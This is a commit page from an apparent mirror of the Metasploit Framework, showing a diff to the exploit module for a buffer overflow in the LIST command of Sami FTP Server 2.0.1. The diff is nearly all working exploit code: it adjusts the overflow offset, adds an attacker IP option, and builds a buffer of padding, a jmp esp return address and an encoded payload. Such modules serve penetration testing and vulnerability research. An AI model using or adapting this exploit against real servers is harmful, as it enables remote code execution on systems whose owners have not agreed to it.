infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Uses IP address length in offset calculation

unstable
dougsko 2013-03-18 16:18:04 -03:00
parent 3d92d6e977
commit fb90a1b497
1 changed files with 10 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/exploits/windows/ftp/sami_ftpd_list.rb
View File

@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow', 'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
'Description' => %q{ 'Description' => %q{
A buffer overflow is triggered when a long LIST A buffer overflow is triggered when a long LIST
command is sent to the server and the user views the Log tab. command is sent to the server while the user is viewing the Logs tab.
}, },
'Platform' => 'win', 'Platform' => 'win',
'Author' => 'Author' =>
@ -48,18 +48,24 @@ class Metasploit4 < Msf::Exploit::Remote
'Windows Universal', 'Windows Universal',
{ {
'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll 'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
'Offset' => 219, 'Offset' => 225,
}, },
], ],
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 27 2013')) 'DisclosureDate' => 'Feb 27 2013'))
register_options(
[
OptString.new('IPADDR', [true, 'Attacker\'s IP address'])
], self.class)
end end
def exploit def exploit
connect_login connect_login
sleep 1
buf = rand_text(target['Offset'], payload_badchars)
ip_length = datastore['IPADDR'].length - 3
buf = rand_text_alphanumeric(target['Offset'] - ip_length)
buf << [ target['Ret'] ].pack('V') buf << [ target['Ret'] ].pack('V')
buf << payload.encoded buf << payload.encoded